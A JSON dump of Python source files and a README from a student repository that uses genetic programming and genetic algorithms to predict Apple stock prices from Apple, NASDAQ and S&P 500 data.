[ { "alpha_fraction": 0.6455142498016357, "alphanum_fraction": 0.6535375714302063, "avg_line_length": 22.220338821411133, "blob_id": "e6836890310cc2a3ae47672cc3ad7d42a41416d8", "content_id": "95f79ad5d57f17b220078cfe80cf01ba8d28e60d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1371, "license_type": "no_license", "max_line_length": 60, "num_lines": 59, "path": "/Rahul_Genetic_Program/analysis/extract_data.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Extracts Data from Trials\n#Rahul Ramakrishnan\n\nimport os\nfirst_dir = '/Users/rahulramakrishnan/Desktop/T_S_Trial_1'\n#second_dir = '/Users/rahulramakrishnan/Desktop/T_S_Trial_2'\n#third_dir = '/Users/rahulramakrishnan/Desktop/T_S_Trial_3'\n\nmean_files = []\nbest_files = []\n\nfor root, dirs, filenames in os.walk(first_dir):\n for f in filenames:\n\tmean_files.append(open(os.path.join(root, f), 'r'))\t\t\n\tbest_files.append(open(os.path.join(root, f), 'r'))\n\nmean_file = open('./mean.txt', 'w')\nbest_file = open('./best.txt', 'w')\n\ndef multiReadMean(f):\n\tmean_in_f = []\n\tfor line in f:\n\t\twords = line.split(' ')\n\t\tmean = words[0]\n\t\tmean_in_f.append(mean)\n\treturn mean_in_f\n\ndef multiReadBest(f):\n\tbest_in_f = []\n\tfor line in f:\n\t\twords = line.split(' ')\n\t\tbest = words[1]\n\t\tbest_in_f.append(best)\n\treturn best_in_f\n\n\nmeans = map(lambda f: multiReadMean(f), mean_files)\nbests = map(lambda f: multiReadBest(f), best_files)\n\n#means = [ [], [], [], [], [] ]\n\nmeans.pop(0)\nbests.pop(0)\n\nfinal_means = []\nfor i in range(0, len(means[0])):\n\tgeneration_means = map(lambda x: float(x[i]), means)\n\tfinal_means.append(min(generation_means))\n\nfinal_bests = []\nfor i in range(0, len(bests[0])):\n\tgeneration_bests = map(lambda x: float(x[i]), bests)\n\tfinal_bests.append(min(generation_bests))\n\nfor m in final_means:\n\tmean_file.write(str(m) +'\\n')\n\nfor b in final_bests:\n\tbest_file.write(str(b) +'\\n')\n\n" }, { "alpha_fraction": 0.6388722062110901, "alphanum_fraction": 0.6544691324234009, "avg_line_length": 19.567901611328125, "blob_id": "62b742b2800411ec445501197531bff7bea708b1", "content_id": "4cade1352bbb123379c210662a9069be1abed8b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 74, "num_lines": 81, "path": "/Rahul_Genetic_Program/README.md", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "Predicting Apple Stock\n======================\nEvolutionary Computing - Genetic Program\n========================================\n\n###Class: Stochastic Optimization\n###Professor: Jason Lohn\n###Author: Rahul Ramakrishnan\n\n**Description:**\nPredicts apple stock price using a genetic program. \nIt is trained using 2010-2013 apple and nasdaq data for\nnow, however, more data will be added soon.\n\n\n**Quick Start**\n\n*Step 1:*\nInstall python 2.7 interpretter\n\n```\nsudo apt-get install python2.7\n```\n\nInstall pip (pip installs python):\n\nhttp://pip.readthedocs.org/en/latest/installing.html\n\n\nOn Linux:\n```\nsudo apt-get install python-pip\n```\n\n\nInstall colors\n\n```\nsudo pip install termcolor\n```\n\n*Step 2:*\nEnsure that Rahul_Genetic_Program/ contains\n- a. predict.py\n- b. apple/ (package containing modules)\n\t- config.py\n\t- tree.py\n\t- initialize.py\n\t- scrape.py\n\t- inspect.py\n\t- recombination.py\n\t- selection.py\n\t- fitness.py\n- c. data/ (contains data)\n- d. output/ (statistical data outputted)\n- e. You can change default parameters in the config.py file\n\n*Step 3:*\nPoint apple/scrape.py\n\tnasdaq line: 42\n\tsp500 line: 72\n\tapple line: 95\n\tto the file data path, \n\ton your system\n\n*Step 4:*\n```\n$ python predict.py\n```\n\n*Step 5:*\nPopulations will be outputted to the screen\n\n\n**TO DO:**\n- Add more signals (S&P, apple tweets, etc.) \n- Fix early convergence from crossover ---------------------------DONE\n- Refactor all for loops into map/reduce/filter/scan -------------DONE\n- Add colors to output -------------------------------------------DONE\n- Add graphs of mean generational error and best fitness----------PROGRESS\n- Add best tree output along with average generational error -----DONE\n\n" }, { "alpha_fraction": 0.6114550828933716, "alphanum_fraction": 0.6424148678779602, "avg_line_length": 31.299999237060547, "blob_id": "3f6c3aa15f3b2f2096d59bd43a7257b7520bbc5f", "content_id": "004886116b5d5c5490a47aba977d35c36e3289ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 646, "license_type": "no_license", "max_line_length": 115, "num_lines": 20, "path": "/Rahul_Genetic_Program/data/test_data/test_data_convert.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#Stochastic Optimization\n\n#Test Data Convert\ndef getAppleData():\n\t#Same thing for nasdaq data as apple\n\tapple = open('../nasdaq.txt', 'r')\n\ttest_apple = open('./test_apple_data.txt', 'w')\t\n\tfor line in apple:\n\t\tinfo = line.split(',')\n\t\tapple_open = float(info[1])\n\t\tapple_low = float(info[2])\n\t\tapple_high = float(info[3])\n\t\tapple_volume = float(info[5])\n\t\tapple_close_price = apple_volume / 1000 - apple_open / 10 + apple_low - apple_high + 1000 \n\t\tprint apple_close_price\n\t\tnew_line = \"%s,%s,%s,%s,%s,%s,%s\" %(info[0], info[1], info[2], info[3], str(apple_close_price), info[5], info[6])\n\t\ttest_apple.write(new_line)\n\t\t\ngetAppleData()\n" }, { "alpha_fraction": 0.699090301990509, "alphanum_fraction": 0.7053883671760559, "avg_line_length": 26.980392456054688, "blob_id": "3cbd117351737ecb7a3b8afe1cdaa4dd43844f68", "content_id": "ffad80f9f2251d6511fa0f867145025712e3468a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 74, "num_lines": 51, "path": "/Genetic_algorithm_Tushar/predictor.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "from data.read_stock import DataHandler\nfrom ga.individual import Individual\nfrom ga.population import Population\nimport numpy as np\n\n\ndataHandler = DataHandler(['apple_test_data.csv', 'NASDAQ_test_data.csv'])\n#dataHandler = DataHandler(['apple_data.csv', 'NASDAQ_data.csv'])\ndata = dataHandler.get_signal_list()\nsignal_ranges = dataHandler.signal_ranges()\n#print signal_ranges\n\ndata_element = len(data[0])\n#print \"data[0]\"\n#print data[0]\n\n\npopulation = Population(100 , signal_ranges, data)\n#for i in population:\n# print i.transform_individual(signal_ranges)\ninitial_fitess_values = map(population.fitness_function, population) \n#print initial_fitess_values\n\n\nnumber_generations = 100\n\npopulation.sus_sampler(initial_fitess_values)\nmax_list = []\nmean_list = []\n\nfor i in xrange(number_generations):\n #print \"initial population\"\n #for i in population:\n # print i.rep\n #print \"before crossover\"\n population.crossover()\n #print \"after crossover\"\n #for i in population:\n # print i.rep\n #print \"before mutation\"\n population.mutation()\n #for i in population:\n # print i.rep\n #print \"after mutation\"\n fitness_vals = map(population.fitness_function, population)\n population.sus_sampler(fitness_vals)\n mean_val = np.mean(fitness_vals)\n max_val = max(fitness_vals)\n print str(mean_val) + \",\" + str(max_val)\n mean_list.append(mean_val)\n max_list.append(max_val)\n\n\n" }, { "alpha_fraction": 0.8275862336158752, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 56, "blob_id": "7f464e48148c7c30e9197e70adf059d162d56c88", "content_id": "b9ddc9edc5ea4109e7e95e737cadb19ba00fe137", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 56, "num_lines": 1, "path": "/Genetic_algorithm_Tushar/transform_data.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "# File contains functions to perform data transformation \n" }, { "alpha_fraction": 0.5877959728240967, "alphanum_fraction": 0.5955823659896851, "avg_line_length": 35.801170349121094, "blob_id": "254031c05f886822eb195cf4c83102ff4c5ac847", "content_id": "bc86004dee2d75d9b934a05806eb8154bae025a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6293, "license_type": "no_license", "max_line_length": 137, "num_lines": 171, "path": "/Genetic_algorithm_Tushar/data/read_stock.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "import csv\nfrom datetime import datetime\n\n\ndef read_csv_file(filename, objtype): \n \"\"\" Function takes a CSV file and a class definition as input\n and returns a list of that object type. It ignores the \n header line of the CSV file. The class constructor needs \n to handle how the list item is handled.\"\"\"\n\n obj_list = []\n\n with open(filename, 'rb') as f:\n reader = csv.reader(f)\n next(reader, None)\n\n for row in reader:\n objinstance = objtype(row)\n obj_list.append(objinstance)\n\n\n return obj_list\n\n\ndef percent_difference(value, orig):\n return (value - orig) / float(orig)\n\n\nclass AppleStockPrice:\n \"\"\" Class to hold the stock price\"\"\"\n def __init__(self,listing):\n self.date_ = datetime.strptime(listing[0], \"%Y-%m-%d\")\n self.open_ = float(listing[1])\n self.high_ = float(listing[2])\n self.low_ = float(listing[3])\n self.close_ = float(listing[4])\n self.volume_ = int(listing[5])\n self.adjclose_ = float(listing[6])\n\n\nclass NasdaqPrice:\n \"\"\" Class to hold the NASDAQ price\"\"\"\n def __init__(self,listing):\n self.date_ = datetime.strptime(listing[0], \"%Y-%m-%d\")\n self.open_ = float(listing[1])\n self.high_ = float(listing[2])\n self.low_ = float(listing[3])\n self.close_ = float(listing[4])\n self.volume_ = int(listing[5])\n self.adjclose_ = float(listing[6])\n\n\nclass FitnessDataObject:\n \"\"\" Data used to evaluate the fitness of the evolved model \"\"\"\n\n def __init__(self):\n self.data = {}\n\n def add_signal(self, name, value = 0.0):\n if type(name) is str and name not in self.data:\n self.data[name] = value\n else:\n print \"Signal name isn't a string\"\n\n def delete_signal(self, name):\n if type(name) is str and name in self.data:\n del self.data[name]\n else:\n print \"Signal name isn't a string or signal doesn't exist\"\n\n def get_signals(self):\n return self.data.keys()\n\n def add_signals(self, names):\n if names:\n for name in names:\n self.add_signal(name)\n\n def put_value(self, signal_name, value):\n self.data[signal_name] = value\n\n def get(self, signal_name):\n return self.data[signal_name]\n\n\nclass DataHandler:\n\n\n def get_dataset(self, file_class):\n apple_stock_prices = read_csv_file(file_class[0][0], file_class[0][1])\n nasdaq_stock_prices = read_csv_file(file_class[1][0], file_class[1][1])\n dataset = []\n\n\n for i in xrange(1, len(apple_stock_prices)):\n\n model = FitnessDataObject()\n open_diff = percent_difference(apple_stock_prices[i].open_, apple_stock_prices[i-1].open_)\n high_diff = percent_difference(apple_stock_prices[i].high_, apple_stock_prices[i-1].high_)\n low_diff = percent_difference(apple_stock_prices[i].low_, apple_stock_prices[i-1].low_)\n close_diff = percent_difference(apple_stock_prices[i].close_, apple_stock_prices[i-1].close_)\n volume_diff = percent_difference(apple_stock_prices[i].volume_, apple_stock_prices[i-1].volume_)\n adjclose_diff = percent_difference(apple_stock_prices[i].adjclose_, apple_stock_prices[i-1].adjclose_)\n #dates_ = apple_stock_prices[i].date_\n\n model.add_signal(\"delta_open\", open_diff)\n model.add_signal(\"delta_high\", high_diff)\n model.add_signal(\"delta_low\", low_diff)\n model.add_signal(\"delta_close\", close_diff)\n model.add_signal(\"delta_volume\", volume_diff)\n model.add_signal(\"delta_adjclose\", adjclose_diff)\n # model.add_signal(\"date\", dates_)\n dataset.append(model)\n \n for i in xrange(1, len(nasdaq_stock_prices)):\n \n model = FitnessDataObject()\n open_diff = percent_difference(nasdaq_stock_prices[i].open_, nasdaq_stock_prices[i-1].open_)\n high_diff = percent_difference(nasdaq_stock_prices[i].high_, nasdaq_stock_prices[i-1].high_)\n low_diff = percent_difference(nasdaq_stock_prices[i].low_, nasdaq_stock_prices[i-1].low_)\n close_diff = percent_difference(nasdaq_stock_prices[i].close_, nasdaq_stock_prices[i-1].close_)\n volume_diff = percent_difference(nasdaq_stock_prices[i].volume_, nasdaq_stock_prices[i-1].volume_)\n adjclose_diff = percent_difference(nasdaq_stock_prices[i].adjclose_, nasdaq_stock_prices[i-1].adjclose_)\n\n #print nasdaq_stock_prices[i].volume_\n #print nasdaq_stock_prices[i-1].volume_\n #print (nasdaq_stock_prices[i].volume_ - nasdaq_stock_prices[i-1].volume_) / float(nasdaq_stock_prices[i -1].volume_)\n\n\n\n #volume_diff = 100 *(nasdaq_stock_prices[i].volume_ - nasdaq_stock_prices[i-1].volume_) / nasdaq_stock_prices[i - 1].volume_\n #print volume_diff\n #dates_ = nasdaq_stock_prices[i].date_\n\n\n model.add_signal(\"delta_nasdaq_open\", open_diff)\n model.add_signal(\"delta_nasdaq_high\", high_diff)\n model.add_signal(\"delta_nasdaq_low\", low_diff)\n model.add_signal(\"delta_nasdaq_close\", close_diff)\n model.add_signal(\"delta_nasdaq_volume\", volume_diff)\n model.add_signal(\"delta_nasdaq_adjclose\", adjclose_diff)\n dataset.append(model)\n\n return dataset\n\n def __init__(self, files):\n file_class = [(files[0] , AppleStockPrice), (files[1] , NasdaqPrice)]\n self.dataset = self.get_dataset(file_class)\n\n\n def signal_ranges(self):\n signal_ranges = []\n if self.dataset != None:\n for signal in self.dataset[0].get_signals():\n l = map(lambda x:x.get(signal), self.dataset)\n min_max = (min(l), max(l))\n signal_ranges.append(min_max)\n else:\n print \"Dataset is None\"\n return signal_ranges\n\n\n def get_signal_list(self):\n signal_data = []\n for i in xrange(len(self.dataset)):\n vals = []\n for signal in self.dataset[i].get_signals():\n val = self.dataset[i].get(signal)\n vals.append(val)\n signal_data.append(vals)\n return signal_data\n" }, { "alpha_fraction": 0.5866666436195374, "alphanum_fraction": 0.5885714292526245, "avg_line_length": 18.407407760620117, "blob_id": "fe542b6331cfc91e5ca49ba7747fdd087cdb7966", "content_id": "9b2c3d340b7092fd17e24370f733cd6667f8e048", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 525, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/Rahul_Genetic_Program/apple/tree.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: tree\n\n'''\n\tNode and Tree Class\n'''\n\n#Genetic Node Class\nclass Node(object):\n #Constructor for Node object\n def __init__(self, value=None):\n self.value = value\n self.left = None\n self.right = None \n\n\n#Genetic Tree Class\n#Uses Genetic Node \nclass Tree(object):\t\n\t#Constructor\n\tdef __init__(self):\n\t\t#Initializes root node\n\t\t#Will be overwritten\n\t\tself.root = Node('root') \n\t\tself.size = 1\n\t\tself.decision = ['left', 'right']\n\t\tself.fitness = None\n\n" }, { "alpha_fraction": 0.6542646288871765, "alphanum_fraction": 0.6654966473579407, "avg_line_length": 34.599998474121094, "blob_id": "8dbef7b8a0bc91fc28083b49aa60e6b87b086fdc", "content_id": "e38605eae32e3c3920d4bff349cd03ee56c3d301", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2849, "license_type": "no_license", "max_line_length": 112, "num_lines": 80, "path": "/Rahul_Genetic_Program/apple/fitness.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: fitness\n\n'''\n\tFitness \n\tFunctions & Wrappers\n'''\n\nimport scrape\nimport recombination\nfrom copy import deepcopy\n\ndef generateFitnesses(population):\t\t\n\tfitnesses = map(lambda x: fitnessValue(x), population)\t\n\n#Calculate the fitness value of a single GP tree\n#and stores it in the tree object\ndef fitnessValue(tree):\n path = [] \n recombination.loadPaths(tree.root, path)\n\n\t#Load market data and stores in respective dictionaries\t\n\tapple_data = scrape.getAppleData()\t\n\tnasdaq_data = scrape.getNasdaqData()\n\tsp500_data = scrape.getSP500Data()\n\t\n\tnodeReplace(path)\t\n\tequation = createEquation(path)\t\n\tdata_size = range(0, len(apple_data))\t\n\tpredicted_prices = map(lambda i: evaluateEquation(i, nasdaq_data, apple_data, sp500_data, equation), data_size)\n\tnext_day_prices = map(lambda data: data['apple_close'], apple_data) #next_day_price is the actual price\n\t\t\n\tpredicted_prices.pop() \t#Removes the last item in the list\n\tnext_day_prices.pop(0) \t#Removes the first item in the list\t\t\n\t\n\tzipped = zip(predicted_prices, next_day_prices)\n\terrors = map(lambda pair: abs(pair[1] - pair[0]), zipped)\n\tfitness = sum(errors)/float(len(errors))\n\n\ttree.fitness = fitness\t#Adds fitness to tree object in-place\t\n\treturn fitness \t\t#For printEquationPopulation function\t\n\ndef evaluateEquation(i, nasdaq_data, apple_data, sp500_data, equation):\n\treturn eval(equation)\n\t\n\n#Replaces path with data by subbing in\n#dictionary that will be eval'd later\ndef nodeReplace(path):\n terminals = scrape.getTerminal() \n\n string_terminals = filter(lambda t: type(t) == type('str'), terminals)\n path_string_terminals = filter(lambda t: t in path, string_terminals) \n\n apple_data = filter(lambda t: t[0] == 'a', path_string_terminals)\n nasdaq_data = filter(lambda t: t[0] == 'n', path_string_terminals)\n\tsp500_data = filter(lambda t: t[0] == 's', path_string_terminals)\n\n map(lambda t: replaceWrapper(path, t, 'a'), apple_data)\n map(lambda t: replaceWrapper(path, t, 'n'), nasdaq_data)\n\tmap(lambda t: replaceWrapper(path, t, 's'), sp500_data)\n\ndef replaceWrapper(path, t, data_type):\n pairs = filter(lambda pair: pair[1] == t, enumerate(path))\n indices = map(lambda pair: pair[0], pairs) \n map(lambda index: replaceWrapper2(path, t, data_type, index), indices)\n\ndef replaceWrapper2(path, t, data_type, index):\n if(data_type == 'a'):\n path[index] = \"apple_data[i]['%s']\" %(t)\n elif(data_type == 'n'):\n path[index] = \"nasdaq_data[i]['%s']\" %(t)\n\telif(data_type == 's'):\n\t\tpath[index] = \"sp500_data[i]['%s']\" %(t)\n\n#Creates the equation that the tree represents\ndef createEquation(path):\n paths = map(lambda node: str(node), path)\n final_path = reduce(lambda x,y: x + \" \" + y, paths)\n return final_path\n\n" }, { "alpha_fraction": 0.685512363910675, "alphanum_fraction": 0.6893993020057678, "avg_line_length": 28.789474487304688, "blob_id": "20bbcb5df87260bb62658a951ea7b87ccd50703e", "content_id": "d8477965714b6769637dbc6bb18685dd6bc79869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2830, "license_type": "no_license", "max_line_length": 82, "num_lines": 95, "path": "/Rahul_Genetic_Program/apple/initialize.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: initialize\n\nimport config\nfrom tree import Node\nfrom tree import Tree\nimport scrape \n\nfrom random import choice\nfrom random import sample\nfrom copy import deepcopy\n\n'''\n\tInitialization \n\tFunctions and Wrappers\n'''\n#Initialize genetic tree population\ndef initPopulation(num_of_trees):\n\ttree_size = config.tree_size\t\n\t#tree = initGeneticTree(6)\n\t#population = map(lambda i: sameTree(tree), range(0, num_of_trees))\t\t\n\tpopulation = map(lambda tree: initGeneticTree(tree_size), range(0, num_of_trees))\n\treturn population\n\ndef sameTree(tree):\n\treturn deepcopy(tree)\t\n\n#Initializes a genetic tree with \n#the specified number of nodes\ndef initGeneticTree(num_of_nodes):\t\n\ttree = Tree()\n\tdecision = ['left', 'right']\n\tmap(lambda x: createRandomNodes(tree.root, decision), range(0, num_of_nodes))\t\n\tfillGeneticTree(tree.root)\n\treturn tree \n\n#Traverse the binary tree and adds a pair \n#of left and right nodes in a random place\ndef createRandomNodes(root, decision):\n chosen = choice(decision)\n if(chosen == 'left' and root.left == None):\n root.left = Node('l')\n\t\troot.right = Node('r')\n elif(chosen == 'right' and root.right == None):\n root.right = Node('r')\n\t\troot.left = Node('l')\n else:\n if(chosen == 'left'):\n createRandomNodes(root.left, decision)\n else: #chosen = 'right'\n createRandomNodes(root.right, decision)\n\n\n#Insert terminal and functional nodes into the\n#genetic tree. \ndef fillGeneticTree(root):\n\t#Load terminal list with terminal nodes\n\tterminal = scrape.getTerminal()\n\t#Load functional list with functional nodes\n\tfunctional = scrape.getFunctional()\t\t\n\t#Keeps track of functional and terminal list positions\t\n\tterminal_index = 0\n\tfunctional_index = 0\n\tstack = []\n\tstack.append(root)\n\ttemp_terminal = sample(terminal, len(terminal)) #shuffle terminal\n\ttemp_functional = sample(functional,len(functional)) #shuffle functional\n\n\t#While loop ensures that initial population has\n\t#one of each type of functional node\n\t#and one of each type of terminal node\t\n\twhile(len(stack) > 0):\t\t\n\t\tcurrent = stack.pop()\t\n\n\t\tif(current.left == None and current.right == None):\n\t\t\t#Node is a leaf, insert terminal node\n\t\t\tcurrent.value = temp_terminal[terminal_index]\n\t\t\tterminal_index += 1\n\t\telse: #Node is not a leaf, insert a functional node\n\t\t\tcurrent.value = temp_functional[functional_index]\n\t\t\tfunctional_index += 1\n\n\t\t#Resets indices if out of bounds\n\t\tif terminal_index == len(temp_terminal):\n\t\t\tterminal_index = 0 \n\t\tif functional_index == len(temp_functional):\n\t\t\tfunctional_index = 0\n\t\t\n\t\ttemp_node = current.right\t\t\n\t\tif temp_node != None:\n\t\t\tstack.append(temp_node) #stack.push\n\n\t\ttemp_node = current.left\n\t\tif temp_node != None:\n\t\t\tstack.append(temp_node) #stack.push\n" }, { "alpha_fraction": 0.8302354216575623, "alphanum_fraction": 0.832713782787323, "avg_line_length": 31.200000762939453, "blob_id": "70beb514ab75cad7827e31a766dccc028688450b", "content_id": "20a9d3fe3d5561ea310a9e45c319fd54308cce3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "no_license", "max_line_length": 64, "num_lines": 25, "path": "/Rahul_Genetic_Program/predict.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#Main Apple Stock Predicting Script\n\nfrom apple import config\nfrom apple import initialize\nfrom apple import inspect\nfrom apple import recombination\nfrom apple import selection\nfrom apple import fitness\n\nfrom termcolor import colored\n\npopulation = initialize.initPopulation(config.population_size)\n\nfor generation in xrange(0, config.generations):\t\t\t\n\tfitness.generateFitnesses(population)\n\tinspect.printEquationPopulation(population, generation)\n\tfor tree in xrange(0, len(population)):\t\t\t\n\t\trecombination.performMutation(population)\n\t\trecombination.performCrossover(population)\n\t#Tournament Selection\n\tselection.tournamentParentSelection(population)\n\t#Roullette Wheel\n\t#roulletteWheel = selection.createRoulletteWheel(population)\n\t#selection.roulletteParentSelection(roulletteWheel, population)\n\n\n" }, { "alpha_fraction": 0.6515709161758423, "alphanum_fraction": 0.6722332239151001, "avg_line_length": 26.379844665527344, "blob_id": "46376daa5f17ea0a42fb9a8e12db8fd242b5624d", "content_id": "5ef5bea7e76159b7edb8e55f70666c57bd450cb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3533, "license_type": "no_license", "max_line_length": 91, "num_lines": 129, "path": "/Rahul_Genetic_Program/apple/recombination.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: recombination \n\n'''\n\tMutation & Crossover\n\tFunctions and Wrappers \n'''\nimport config\nfrom random import choice\nfrom random import random\nfrom random import randint\nfrom copy import deepcopy\n\n'''\n\tMutation\n'''\ndef performMutation(population):\t\n\tfor tree in xrange(0, len(population)):\n\t\tdice_roll = random()\n\t\tif (dice_roll < config.m_probability):\n\t\t\tmutate(population[tree].root)\t\n\ndef mutate(root):\n\t#Choose to swap terminal or functional nodes\n\tnode_type = choice(['terminal', 'functional'])\n\tif(node_type == 'terminal'): \n\t\tt_node_values = getNodes(root,1)\n\t\tv_1 = choice(t_node_values)\n\t\tt_node_values.remove(v_1) #remove from pool\n\t\tv_2 = choice(t_node_values)\n\t\tnode_1 = DFS(root, v_1) #Retrieve node references\n\t\tnode_2 = DFS(root, v_2)\t\n\t\tswapValues(node_1, node_2)\n\telse: #type == 'functional'\n\t\tf_node_values = getNodes(root,2)\n\t\t#Safeguards against a one element f_node\n\t\tif (len(f_node_values) > 1):\n\t\t\tv_1 = choice(f_node_values)\t\n\t\t\tf_node_values.remove(v_1) #remove from pool\n\t\t\tv_2 = choice(f_node_values)\n\t\t\tnode_1 = DFS(root, v_1) #Retrieve node references\n\t\t\tnode_2 = DFS(root, v_2)\n\t\t\tswapValues(node_1, node_2)\t\t\t\t\n\n\n'''\n\tCrossover\n'''\ndef performCrossover(population):\n\tsize = len(population)\n\tfor i in xrange(0, size):\n\t\tif(random() <= config.c_probability and (i+1) < size):\n\t\t\tcrossover(population[i].root, population[i+1].root)\n\t\t\t#For random selection\n\t\t\t#choice_1 = randint(0, size-1)\t\n\t\t\t#choice_2 = randint(0, size-1)\n\t\t\t#if(choice_1 != choice_2):\n\t\t\t#\tcrossover(population[choice_1].root, population[choice_2].root)\t\t\n\n\ndef crossover(root_1, root_2):\n\tnode_1 = chooseRandomSubTree(root_1, 3)\n\tnode_2 = chooseRandomSubTree(root_2, 3)\n swapValues(node_1, node_2) #Swap subtrees\n swapNodes(node_1, node_2)\n\n\n'''\n\tWrappers\n'''\ndef chooseRandomSubTree(root, t_or_f):\t\t\n\tfunctional_nodes = getNodes(root, 3)\t\n\t#Choose from sub-trees that have a depth greater than 2\n\t#This prevents pre-mature convergence\n\tqualified_nodes = filter(lambda node: depth(node) > config.minimum_size, functional_nodes)\n\tnode = choice(qualified_nodes)\t\n\treturn node\n\t\ndef getNodes(root, t_or_f=0):\t\n\tnodes = []\n\tloadPaths(root, nodes, t_or_f)\n\treturn nodes\n\ndef swapValues(node_1, node_2):\n\ttemp_value = node_1.value\n\tnode_1.value = node_2.value\n\tnode_2.value = temp_value\n\ndef swapNodes(node_1, node_2):\n\ttemp_left = node_1.left\n\ttemp_right = node_1.right\n\tnode_1.left = node_2.left\n\tnode_1.right = node_2.right\n\tnode_2.left = temp_left\n\tnode_2.right = temp_right\n\n#Loads path with an in-order traversal\t\n#all, terminal, or functional nodes\ndef loadPaths(root, path=[], t_or_f=0):\t\n\tif root == None:\n\t\treturn\n\tloadPaths(root.left, path, t_or_f)\n\tif(t_or_f == 2): #Only append functional nodes\n\t\tif(root.left != None and root.right != None):\n\t\t\tpath.append(root.value)\t\n\telif(t_or_f == 1): #Only append terminal Nodes\n\t\tif(root.left == None and root.right == None):\n\t\t\tpath.append(root.value)\n\telif(t_or_f == 3): #Only append functional node REFERENCES\n\t\tif(root.left != None and root.right != None):\n\t\t\tpath.append(root)\n\telse: # t_or_f == 0, append all nodes\n\t\tpath.append(root.value)\n\tloadPaths(root.right, path, t_or_f)\n\n#Depth First Search\ndef DFS(root, target_value):\n if(root == None):\n return \n if root.value == target_value:\n return root\n return DFS(root.left, target_value) or DFS(root.right, target_value)\n\n#Depth of a Tree\ndef depth(root):\n\tif(root == None):\n\t\treturn 0\n\telse:\n\t\treturn 1 + max(depth(root.left), depth(root.right))\n\n" }, { "alpha_fraction": 0.671023964881897, "alphanum_fraction": 0.6971677541732788, "avg_line_length": 29.600000381469727, "blob_id": "61905dddd0ef823e2fee13f13b76664dc1647c81", "content_id": "c7003693a6de438b3e25c0acf870d1c7bb763aa5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 459, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/Rahul_Genetic_Program/apple/config.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: config\n\npopulation_size = 50 #Number of trees in the population\ntournament_size = 3 #Size of tournament during tournament selection\n\ntree_size = 10 #Number of nodes in a tree\ngenerations = 50 #Number of generations\n\nc_probability = .7 #Crossover probability\nm_probability = .2 #Mutation probability\n\nminimum_size = 3 #Minimum size of the tree that will be \n\t\t #preserved during crossover\niteration = 10\n" }, { "alpha_fraction": 0.6075268983840942, "alphanum_fraction": 0.6075268983840942, "avg_line_length": 14.166666984558105, "blob_id": "1fc665d4133ae3ff98caa057df8ca076ef62c503", "content_id": "a99a364064673244c04966f3f14583af9b75d409", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 36, "num_lines": 12, "path": "/Rahul_Genetic_Program/data/reverse_data.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "\n_in = open('./APPLE_STOCK.csv', 'r')\nout = open('./apple_stock.txt','w')\n\nlines = []\n\nfor line in _in:\n\tlines.append(line)\n\nlines.reverse()\n\nfor line in lines:\n\tout.write(str(line))\n\n\t\n" }, { "alpha_fraction": 0.608851969242096, "alphanum_fraction": 0.6164906620979309, "avg_line_length": 31.669116973876953, "blob_id": "a32ce224ecb7820a1bc9945e1f37b6e964286f8c", "content_id": "8122f42bff470e83fa2d75bd680702b1ac8df776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4451, "license_type": "no_license", "max_line_length": 114, "num_lines": 136, "path": "/Rahul_Genetic_Program/apple/inspect.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: inspect\n\n'''\n Tree Inspection \n\t &\n\tTesting Operators\n'''\n\nimport recombination\nimport fitness\nimport initialize\nimport config\n\nfrom termcolor import colored\nmean_best = open('/Users/rahulramakrishnan/Desktop/trial_2_' + str(config.iteration) + '_real_mean_best.txt', 'w')\n#Prints Trees Level by Level\ndef printTreePopulation(population):\n\tmap(lambda tree: printTree(tree), population)\n\n#Prints Trees by their Equation (in-order)\ndef printEquationPopulation(population, generation):\n\tsize = len(population)\n\tequation_dict = {}\n\t#print (colored(\"Size of population: %d\", 'blue') %(len(population)))\n\t\n for tree in population:\n\t\tpath = []\n recombination.loadPaths(tree.root, path)\n equation = fitness.createEquation(path)\n error = fitness.fitnessValue(tree)\n\t\tif equation not in 